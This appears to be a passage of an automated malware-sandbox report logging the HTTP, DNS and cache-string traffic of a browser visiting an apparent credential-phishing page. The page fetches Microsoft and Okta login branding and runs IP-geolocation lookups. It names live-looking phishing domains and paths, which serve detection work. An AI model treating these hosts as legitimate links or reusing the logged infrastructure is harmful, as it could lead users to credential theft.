laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1Host: s3irk.ativens.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFkiLCJtYWMiOiJjNmVlNTk0NGEzMTY4OWRlNWQyYWJmMDg4MmQwZGY5M2EzNWU2NmU1OWMxOTExZjQ0NzhiNmZmODE5OWY0ZjgxIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.itanhangasaude.com.br
Source: global traffic	DNS traffic detected: DNS query: vkwek.ckyucle.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: nzd92.6gniu68.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: ipapi.co
Source: global traffic	DNS traffic detected: DNS query: s3irk.ativens.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msauthimages.net

Source: unknown

HTTP traffic detected: POST /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1348Server: cloudflareCF-RAY: 89d53a5f9edd8c23-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA==Server: cloudflareCF-RAY: 89d53a8feab28c47-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg==Server: cloudflareCF-RAY: 89d53aab4c9e728a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: bnqcWyO0I0VHDQ3UvW45pA==$c7sV2ixOd2+Gu37NSWq2EQ==Server: cloudflareCF-RAY: 89d53b16392d0f39-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2XypR95Qs7VWdniFUiARnjZ44B9gUvUfBVwLe4MpOYwxw4ib2rjoDCKiWeXOu8bdIEFyOxSpEu4wlwqHJFE6jmg3VyGvkB0%2FYfJuE9w7IHxEVE5Ayhduj9KpAsk5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b1cc895428e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNr7K31YxCybawgO8UcrvC9KOG8x01hj10z4d6VsyJz8tdqSzuEzr2ucdsLTt4o9vVVqnxpyXDz3viB292rO%2Bl2gk1mmsmQNNxMEte%2FgZ9AQMb3D4NGU2dlpMIR%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b3eafe68c36-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:12 GMTContent-Type: application/json; charset=utf-8Content-Length: 155Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d53b593c4fc411-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b5f5a3843b8-EWR

Source: chromecache_118.2.dr	String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_126.2.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_126.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_118.2.dr	String found in binary or memory: https://github.com/fent)
Source: chromecache_126.2.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_126.2.dr	String found in binary or memory: https://recaptcha.net
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_126.2.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_123.2.dr	String found in binary or memory: https://vkwek.ckyucle.com/2DUx/#-
Source: chromecache_126.2.dr	String found in binary or memory: https://www.apache.org/licenses/
Source: chromecache_126.2.dr, chromecache_121.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
